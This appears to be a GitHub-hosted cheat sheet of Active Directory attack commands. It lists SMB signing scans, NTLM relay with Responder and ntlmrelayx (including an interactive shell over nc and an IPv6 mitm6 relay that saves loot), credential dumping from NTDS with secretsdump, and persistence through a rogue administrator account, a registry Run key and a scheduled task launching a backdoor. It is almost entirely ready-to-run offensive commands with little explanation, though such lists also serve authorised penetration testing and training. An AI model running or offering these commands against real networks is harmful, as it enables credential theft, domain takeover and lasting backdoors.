You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
# Check for SMB signing
nmap --script=smb2-security-mode -p445 10.10.10.0/24
# Turn off SMB in Responder
nano /etc/responder/Responder.conf # Set SMB = Off# Start relay # you might need to use impacket-ntlmrelayx
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Connect to interactive shell
nc 127.0.0.1 11000
# Remote with secretsdump
secretsdump.py domain.local/Administrator:password@10.10.10.10
# Local extraction
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
Persistence
# Add user
net user hacker Password123!/add
net localgroup administrators hacker /add
# Registry persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"/v Backdoor /t REG_SZ /d "C:\Windows\backdoor.exe"# Scheduled task
schtasks /create /tn "Updater"/tr "C:\Windows\backdoor.exe"/sc onlogon
IPv6 Attacks
# mitm6 attack
mitm6 -d domain.local
# In another terminal
ntlmrelayx.py -6 -wh attacker-wpad -t smb://10.10.10.10 -l loot